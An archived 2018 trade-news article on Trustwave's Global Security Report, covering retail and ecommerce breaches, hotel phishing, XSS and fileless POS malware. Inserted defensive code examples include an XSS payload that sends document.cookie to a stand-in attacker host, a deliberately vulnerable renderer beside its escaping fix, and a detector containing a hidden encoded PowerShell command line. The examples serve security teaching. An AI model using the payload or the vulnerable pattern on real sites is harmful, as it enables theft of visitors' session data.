The Green Sheet

Monday, April 9, 2018

Trustwave data points to shifting cyber threats

As cybersecurity defenses continue to evolve, organized criminal elements seek new ways to exploit systems. After analyzing billions of logged security and compromise events across 21 countries, hundreds of hands-on data breach investigations and internal research, Trustwave Holdings Inc. released a comprehensive analysis in its 2018 Trustwave Global Security Report.

Marking the annual security study's 10th year, the 105-page report revealed fewer physical POS system attacks. Yet retail (16.7 percent of breach incidents) and payment card data (targeted in 40 percent of breaches) remain top targets for cybercriminals. "There's actually been a decline in attacks that target point-of-sale systems, which points to the maturing of security in brick-and-mortar retail shops," said Karl Sigler, Manager of Threat Intelligence at Trustwave.

The report found that as on-site attacks decline, ecommerce environments have taken up much of the slack: 30 percent of the incidents studied occurred in ecommerce environments versus 20 percent in physical POS environments. Spam volume, which accounted for 39.2 percent of inbound email, has dropped in recent years. As mass spam becomes less effective, attacks involving targeted phishing and social engineering are gaining ground, according to Trustwave.

A section of the report addresses a type of phishing attack that has hit a number of hotels. The attacker phones the hotel claiming to have a problem making a reservation and asks the clerk to open an email attachment that supposedly contains the reservation details; once the attachment is opened, the hotel computer is infected with malware. Sigler stressed the importance of being skeptical in phone and email situations, and of taking steps to confirm the legitimacy of callers or senders before any action is taken.

In cases like this, security can be more of a human issue than one related to technology. "You can buy all of the security products in the world, but unless you have the people and know-how to implement them correctly, they're not going to do anything for your security profile," Sigler stated.

Targeted attacks on the rise

Alarmingly, the study found that 100 percent of the web applications tested had at least one vulnerability, with a median of 11 vulnerabilities per application. Analysts noted that web attacks have become more prevalent and sophisticated. A number of breaches examined in the study showed careful preplanning on the part of criminals, who probed for vulnerable software packages and tools before exploiting them. Cross-site scripting (XSS) topped the list in this category, involved in 40 percent of the web attack attempts identified, followed by SQL injection at 24 percent of web attacks attempted.

XSS attacks cause a website to deliver attacker-supplied script that executes in the browsers of the site's visitors, so the damage lands on the users rather than on the server itself. "If your website is vulnerable to cross-site scripting, your website itself is not vulnerable to attack, your customers are," Sigler noted. "If I know that your website is vulnerable to cross-site scripting, I can start attacking your entire customer base, which becomes a reputation hit for the organization."
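The point above is easiest to see in code. The following is an added example, not code from the Trustwave report or from the article: a reflected XSS bug in a hypothetical search page, the fix by contextual output escaping, and a crude check showing that the injected script survives in the vulnerable output but not in the fixed one. The attacker payload, the `evil.example` host and the `shop.example` site are constructed for the illustration.

```javascript
// Added example (not from the Trustwave report or the article): a reflected
// XSS bug in a search page and its fix by contextual output encoding.

// Constructed attacker input, e.g. delivered to victims as
// https://shop.example/search?q=<this string> inside a phishing link.
const EVIL_QUERY =
  '<script>fetch("https://evil.example/?c=" + document.cookie)</script>';

// Vulnerable: the untrusted query string is concatenated straight into HTML,
// so the attacker's script runs in every visitor's browser, on the site's origin.
function renderSearchVulnerable(query) {
  return `<h1>Results for ${query}</h1>`;
}

// Fix: escape the characters that change meaning in HTML text and quoted
// attribute contexts before interpolating. This encoder is for those two
// contexts only; inline JavaScript, URLs and CSS need their own encoders.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

function renderSearchSafe(query) {
  return `<h1>Results for ${escapeHtml(query)}</h1>`;
}

// Crude check: does a raw <script ...> tag survive in the rendered output?
// Good enough to show the difference here; real testing drives a browser or
// a DOM-aware scanner rather than a regex.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Stand-alone demo.
console.log('vulnerable:', renderSearchVulnerable(EVIL_QUERY));
console.log('safe      :', renderSearchSafe(EVIL_QUERY));
```

Note that the server is never compromised in this scenario; the cookie theft happens entirely in the visitor's browser, which is exactly why the site owner may not notice until customers complain. Output escaping is the primary fix; a Content-Security-Policy header that disallows inline script is a worthwhile second layer.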

Another trend Trustwave identified is increased use of fileless POS malware, which is more difficult for antivirus protections to detect. "By embedding the malicious code directly in memory, as opposed to writing it to disk, there is a lot greater chance that they're going to get away with the attack," Sigler said.

He pointed out that to counter threats such as this, a number of heuristic anti-malware systems exist that look for abnormal behavior rather than for the presence of a specific file, so that malware can be detected and addressed even when nothing is written to disk.
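To make the behavior-based idea concrete, here is an added example that is not Trustwave's product or detection logic and not part of the article: a toy detector that runs over constructed endpoint telemetry and flags a process on what it does (spawning hidden, encoded PowerShell from an Office application; reading the memory of a POS process; connecting out afterwards) rather than on any file hash. The event shape, the `pos.exe` process name, the PIDs and the addresses are all assumptions made for the illustration.

```javascript
// Added example (not Trustwave's logic): a toy behaviour-based detector for
// memory-scraping POS malware. The telemetry is constructed and the rules are
// illustrative assumptions, not a vendor's detection content.

// Assumed names of POS processes whose memory holds unencrypted card data.
const POS_IMAGES = ['pos.exe'];

// Constructed endpoint events in a simplified shape. The scraper (pid 912) is
// an in-memory PowerShell payload: no malware file is ever written to disk,
// so there is nothing for a file-signature scanner to match.
const EVENTS = [
  { pid: 410, action: 'start', image: 'C:\\POS\\pos.exe', parent: 'explorer.exe' },
  { pid: 555, action: 'start', image: 'C:\\Windows\\System32\\svchost.exe', parent: 'services.exe' },
  { pid: 555, action: 'net_connect', dst: '192.0.2.10:443' },
  { pid: 912, action: 'start',
    image: 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
    parent: 'winword.exe',
    cmdline: 'powershell.exe -nop -w hidden -enc SQBFAFgAIAAo...' },
  { pid: 912, action: 'open_process', target: 410, access: 'PROCESS_VM_READ' },
  { pid: 912, action: 'read_process_memory', target: 410, bytes: 4194304 },
  { pid: 912, action: 'net_connect', dst: '203.0.113.7:443' },
];

function baseName(path) {
  return String(path).split(/[\\/]/).pop().toLowerCase();
}

// Returns one alert per process that exhibits scraper behaviour, with reasons.
function detectMemoryScrapers(events) {
  const procs = new Map();
  const getProc = (pid) => {
    if (!procs.has(pid)) {
      procs.set(pid, { pid, image: '', parent: '', cmdline: '', readPos: false, reasons: [] });
    }
    return procs.get(pid);
  };
  // Pass 1: learn process identities so target lookups work regardless of order.
  for (const e of events) {
    if (e.action === 'start') {
      Object.assign(getProc(e.pid), { image: e.image, parent: e.parent, cmdline: e.cmdline || '' });
    }
  }
  // Pass 2: apply behaviour rules in event order.
  for (const e of events) {
    const p = getProc(e.pid);
    switch (e.action) {
      case 'start':
        // Rule 1: hidden, encoded PowerShell launched by an Office application,
        // a common delivery stage for payloads that live only in memory.
        if (baseName(p.image) === 'powershell.exe'
            && /-enc(odedcommand)?\s/i.test(p.cmdline)
            && /-w(indowstyle)?\s+hidden/i.test(p.cmdline)
            && /^(winword|excel|outlook)\.exe$/i.test(p.parent)) {
          p.reasons.push(`hidden encoded PowerShell spawned by ${p.parent}`);
        }
        break;
      case 'read_process_memory': {
        // Rule 2: reading the memory of a POS process, where track data lives.
        const target = procs.get(e.target);
        if (target && POS_IMAGES.includes(baseName(target.image))) {
          p.readPos = true;
          p.reasons.push(`read ${e.bytes} bytes from POS process ${target.image} (pid ${e.target})`);
        }
        break;
      }
      case 'net_connect':
        // Rule 3: outbound connection after scraping, i.e. likely exfiltration.
        if (p.readPos) p.reasons.push(`outbound connection to ${e.dst} after reading POS memory`);
        break;
      default:
        break;
    }
  }
  return [...procs.values()]
    .filter((p) => p.reasons.length > 0)
    .map((p) => ({ pid: p.pid, image: p.image, reasons: p.reasons }));
}

console.log(JSON.stringify(detectMemoryScrapers(EVENTS), null, 2));
```

The benign `svchost.exe` process also makes an outbound connection but never touches POS memory, so it produces no alert; the detector keys on the combination of behaviours, not on any single event. In a real deployment the rules would come from endpoint telemetry (process creation, cross-process memory access, network connections) and would be tuned against the site's own POS software and expected traffic.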

For a free copy of the report, visit www2.trustwave.com/globalsecurityreport.html.


Notice to readers: These are archived articles. Contact names or information may be out of date. We regret any inconvenience.
